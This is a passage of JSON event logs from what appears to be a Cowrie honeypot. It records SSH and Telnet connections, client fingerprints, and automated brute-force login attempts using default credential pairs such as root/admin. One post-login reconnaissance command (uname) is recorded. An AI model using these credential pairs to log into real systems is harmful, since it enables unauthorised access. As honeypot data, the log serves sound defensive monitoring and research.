ha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T00:43:14.270980Z","src_ip":"203.195.82.145","session":"8ff7f15e8ea1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53816,"dst_ip":"1.2.3.4","dst_port":22,"session":"eec45eb5103a","protocol":"ssh","message":"New connection: 212.227.125.160:53816 (1.2.3.4:22) [session: eec45eb5103a]","sensor":"my-vps","timestamp":"2025-08-31T00:43:19.602850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:43:19.603607Z","src_ip":"212.227.125.160","session":"eec45eb5103a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:43:19.677237Z","src_ip":"212.227.125.160","session":"eec45eb5103a"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:19.919602Z","src_ip":"212.227.125.160","session":"eec45eb5103a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:21.054822Z","src_ip":"212.227.125.160","session":"eec45eb5103a"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:22.048089Z","src_ip":"203.195.82.145","session":"8ff7f15e8ea1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59796,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ba4209818fa","protocol":"ssh","message":"New connection: 212.227.125.160:59796 (1.2.3.4:22) [session: 3ba4209818fa]","sensor":"my-vps","timestamp":"2025-08-31T00:43:29.979660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:43:29.980538Z","src_ip":"212.227.125.160","session":"3ba4209818fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:43:30.053522Z","src_ip":"212.227.125.160","session":"3ba4209818fa"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:30.303043Z","src_ip":"212.227.125.160","session":"3ba4209818fa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:31.475391Z","src_ip":"212.227.125.160","session":"3ba4209818fa"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":46928,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e8d74bc5bd7","protocol":"telnet","message":"New connection: 79.124.8.120:46928 (1.2.3.4:23) [session: 7e8d74bc5bd7]","sensor":"my-vps","timestamp":"2025-08-31T00:43:33.368049Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:43:33.407489Z","src_ip":"79.124.8.120","session":"7e8d74bc5bd7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:43:33.423743Z","src_ip":"79.124.8.120","session":"7e8d74bc5bd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51602,"dst_ip":"1.2.3.4","dst_port":22,"session":"f74ffc89176c","protocol":"ssh","message":"New connection: 212.227.235.229:51602 (1.2.3.4:22) [session: f74ffc89176c]","sensor":"my-vps","timestamp":"2025-08-31T00:43:34.063076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:43:34.064024Z","src_ip":"212.227.235.229","session":"f74ffc89176c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:43:34.369173Z","src_ip":"212.227.235.229","session":"f74ffc89176c"}
{"eventid":"cowrie.login.failed","username":"wrapper","password":"123456","message":"login attempt [wrapper/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:35.637305Z","src_ip":"212.227.235.229","session":"f74ffc89176c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:36.945993Z","src_ip":"212.227.235.229","session":"f74ffc89176c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58910,"dst_ip":"1.2.3.4","dst_port":22,"session":"be1f389a574e","protocol":"ssh","message":"New connection: 212.227.125.160:58910 (1.2.3.4:22) [session: be1f389a574e]","sensor":"my-vps","timestamp":"2025-08-31T00:43:40.447306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:43:40.448083Z","src_ip":"212.227.125.160","session":"be1f389a574e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:43:40.522035Z","src_ip":"212.227.125.160","session":"be1f389a574e"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:40.746585Z","src_ip":"212.227.125.160","session":"be1f389a574e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:41.897221Z","src_ip":"212.227.125.160","session":"be1f389a574e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51842,"dst_ip":"1.2.3.4","dst_port":22,"session":"645bb9ed061a","protocol":"ssh","message":"New connection: 212.227.235.229:51842 (1.2.3.4:22) [session: 645bb9ed061a]","sensor":"my-vps","timestamp":"2025-08-31T00:43:42.646020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:43:43.570275Z","src_ip":"212.227.235.229","session":"645bb9ed061a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:43:43.666637Z","src_ip":"212.227.235.229","session":"645bb9ed061a"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"1234567","message":"login attempt [daemon/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:48.348990Z","src_ip":"212.227.235.229","session":"645bb9ed061a"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:50.320108Z","src_ip":"212.227.235.229","session":"645bb9ed061a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33448,"dst_ip":"1.2.3.4","dst_port":22,"session":"603444887385","protocol":"ssh","message":"New connection: 212.227.125.160:33448 (1.2.3.4:22) [session: 603444887385]","sensor":"my-vps","timestamp":"2025-08-31T00:43:50.878024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:43:50.878888Z","src_ip":"212.227.125.160","session":"603444887385"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:43:50.953213Z","src_ip":"212.227.125.160","session":"603444887385"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:43:51.181782Z","src_ip":"212.227.125.160","session":"603444887385"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:43:52.340200Z","src_ip":"212.227.125.160","session":"603444887385"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41804,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aaa7d6bcdda","protocol":"ssh","message":"New connection: 212.227.125.160:41804 (1.2.3.4:22) [session: 1aaa7d6bcdda]","sensor":"my-vps","timestamp":"2025-08-31T00:44:01.261363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:44:01.263124Z","src_ip":"212.227.125.160","session":"1aaa7d6bcdda"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:44:01.337917Z","src_ip":"212.227.125.160","session":"1aaa7d6bcdda"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:44:01.633880Z","src_ip":"212.227.125.160","session":"1aaa7d6bcdda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:44:02.344793Z","src_ip":"212.227.125.160","session":"1aaa7d6bcdda"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:44:02.345544Z","src_ip":"212.227.125.160","session":"1aaa7d6bcdda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:02.472150Z","src_ip":"212.227.125.160","session":"1aaa7d6bcdda"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:02.473181Z","src_ip":"212.227.125.160","session":"1aaa7d6bcdda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36418,"dst_ip":"1.2.3.4","dst_port":22,"session":"57999b41ff8e","protocol":"ssh","message":"New connection: 212.227.235.229:36418 (1.2.3.4:22) [session: 57999b41ff8e]","sensor":"my-vps","timestamp":"2025-08-31T00:44:03.186995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:44:03.188197Z","src_ip":"212.227.235.229","session":"57999b41ff8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:44:03.255840Z","src_ip":"212.227.235.229","session":"57999b41ff8e"}
{"eventid":"cowrie.login.failed","username":"liy","password":"123456","message":"login attempt [liy/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:44:03.567901Z","src_ip":"212.227.235.229","session":"57999b41ff8e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:04.637832Z","src_ip":"212.227.235.229","session":"57999b41ff8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42786,"dst_ip":"1.2.3.4","dst_port":22,"session":"48740ed5611c","protocol":"ssh","message":"New connection: 212.227.125.160:42786 (1.2.3.4:22) [session: 48740ed5611c]","sensor":"my-vps","timestamp":"2025-08-31T00:44:04.990863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:44:05.615036Z","src_ip":"212.227.125.160","session":"48740ed5611c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:44:05.615929Z","src_ip":"212.227.125.160","session":"48740ed5611c"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"1234567","message":"login attempt [daemon/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T00:44:07.776932Z","src_ip":"212.227.125.160","session":"48740ed5611c"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:44:09.224845Z","src_ip":"212.227.125.160","session":"48740ed5611c"}
